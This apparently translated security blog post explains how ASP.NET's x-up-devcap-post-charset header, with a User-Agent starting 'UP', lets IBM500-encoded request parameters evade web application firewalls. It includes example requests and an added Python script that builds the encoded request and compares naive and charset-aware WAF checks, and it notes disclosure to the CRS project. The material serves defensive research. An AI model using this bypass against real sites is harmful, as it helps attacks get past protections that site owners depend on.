I have published several articles before on using request-encoding techniques to bypass WAFs. In those articles I not only described the bypass method but also made clear that WAF products can defeat it by blocking specific character sets, or by allowing only white-listed charsets in the Content-Type header.
After further research I found a request header, x-up-devcap-post-charset, that ASP.NET honours in place of the charset attribute of Content-Type. It can therefore be used to name the body's character set and sidestep whatever detection and protection a WAF applies to the Content-Type request header.
Now for x-up-devcap-post-charset itself. An example request:
POST /test/a.aspx?%C8%85%93%93%96%E6%96%99%93%84= HTTP/1.1
Host: target
User-Agent: UP foobar
Content-Type: application/x-www-form-urlencoded
x-up-devcap-post-charset: ibm500
Content-Length: 40

%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7
As shown above, the Content-Type header carries no charset; instead x-up-devcap-post-charset names the character set (IBM500, an EBCDIC code page) in which the query string and body are encoded. In addition, for ASP.NET to honour this header the User-Agent value must start with UP. A WAF that only parses the charset attribute of Content-Type decodes the body with the wrong encoding and never sees the plain parameter names and values.
The encoded parameters in the request above were generated automatically by the Burp Suite HTTP Smuggler extension. The original request is:
POST /testme87/a.aspx?HelloWorld= HTTP/1.1
Host: target
User-Agent: UP foobar
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

input1=xxxxxxx
I came across this header while looking for something else in the ASP.NET framework source. The following code shows that ASP.NET reads the content encoding from this header before it looks at the charset attribute of Content-Type:
https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362
and
https://github.com/Microsoft/referencesource/blob/08b84d13e81cfdbd769a557b368539aac6a9cb30/System.Web/HttpRequest.cs#L905
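To make the mechanics concrete, here is an added example (my own code, not from the original post and not ASP.NET's code). It rebuilds the IBM500-encoded request shown earlier from the plain one, mirrors the charset lookup order of the linked HttpRequest.cs code, and runs a toy rule over the body both ways: as a WAF that ignores the header sees it, and after decoding the way ASP.NET will. The Host and User-Agent values, the utf-8 default, the blocked parameter name and the lower-cased header dictionary are assumptions of this example.

```python
import codecs
import re
from urllib.parse import quote, unquote_to_bytes


def encode_form(params, charset):
    """Encode each name/value in `charset`, then percent-encode the bytes.
    Returns the application/x-www-form-urlencoded string as it appears on the wire."""
    pairs = []
    for name, value in params:
        pairs.append(quote(name.encode(charset), safe="") + "="
                     + quote(value.encode(charset), safe=""))
    return "&".join(pairs)


def decode_form(body, charset):
    """Inverse of encode_form: percent-decode to raw bytes, then decode them in `charset`."""
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote_to_bytes(name).decode(charset)] = unquote_to_bytes(value).decode(charset)
    return params


def build_request(path, query_params, body_params, charset="ibm500"):
    """Assemble a request in the shape of the post's example. Host and User-Agent values
    are constructed for this example; Content-Length counts the percent-encoded body."""
    body = encode_form(body_params, charset)
    query = encode_form(query_params, charset)
    lines = [
        "POST %s?%s HTTP/1.1" % (path, query),
        "Host: target",
        "User-Agent: UP foobar",
        "Content-Type: application/x-www-form-urlencoded",
        "x-up-devcap-post-charset: %s" % charset,
        "Content-Length: %d" % len(body),
        "",
        body,
    ]
    return "\r\n".join(lines)


def _known_codec(name):
    try:
        codecs.lookup(name)
        return True
    except LookupError:
        return False


def resolve_charset(headers, default="utf-8"):
    """Mirror the lookup order of the linked HttpRequest.cs: x-up-devcap-post-charset is used
    only when User-Agent starts with "UP" and names a known encoding; otherwise the charset
    attribute of Content-Type; otherwise a default (utf-8 is an assumption of this example,
    ASP.NET's real default is configurable). `headers` maps lower-cased names to values."""
    if headers.get("user-agent", "").startswith("UP"):
        name = headers.get("x-up-devcap-post-charset", "")
        if name and _known_codec(name):
            return name
    match = re.search(r'charset="?([\w.:-]+)"?', headers.get("content-type", ""), re.IGNORECASE)
    if match and _known_codec(match.group(1)):
        return match.group(1)
    return default


def naive_inspect(body, blocked=("input1",)):
    """What a WAF that ignores the request charset sees: the percent-decoded bytes read as
    Latin-1, one byte per character. The rule blocks a parameter name (toy signature)."""
    raw = unquote_to_bytes(body).decode("latin-1")
    return any(word in raw for word in blocked)


def charset_aware_inspect(headers, body, blocked=("input1",)):
    """The same rule, applied after decoding the body the way ASP.NET will."""
    try:
        params = decode_form(body, resolve_charset(headers))
    except UnicodeDecodeError:
        return True  # a body the application's charset cannot decode is treated as suspicious
    return any(word in params for word in blocked)


if __name__ == "__main__":
    request = build_request("/test/a.aspx", [("HelloWorld", "")], [("input1", "xxxxxxx")])
    print(request)
    hdrs = {"user-agent": "UP foobar", "x-up-devcap-post-charset": "ibm500",
            "content-type": "application/x-www-form-urlencoded"}
    body = request.split("\r\n\r\n", 1)[1]
    print("naive WAF blocks:", naive_inspect(body))
    print("charset-aware WAF blocks:", charset_aware_inspect(hdrs, body))
```

The two inspection functions show the gap: the naive check passes the IBM500 body while the charset-aware one, which honours the header exactly as the framework does, catches the parameter name. Decoding the body with the application's charset is only half a fix; a WAF should also apply the same white list to x-up-devcap-post-charset that it applies to the Content-Type charset, which is what the CRS rule mentioned below does.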
I expect this encoding bypass to work against most WAFs, since I doubt they handle this header. The OWASP ModSecurity Core Rule Set (CRS) will soon have a dedicated rule for it: before publishing this article I shared the technical details with Christian Folini (@ChrFolini) of CRS, and the new rule is at https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/1392.
References:
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/request-encoding-to-bypass-web-application-firewalls/
https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour
https://soroush.secproject.com/blog/2018/08/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour/
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/
https://github.com/nccgroup/BurpSuiteHTTPSmuggler/

Thanks for reading!
This article was compiled and translated by 白帽汇 and does not represent any views or positions of 白帽汇.
Source: https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/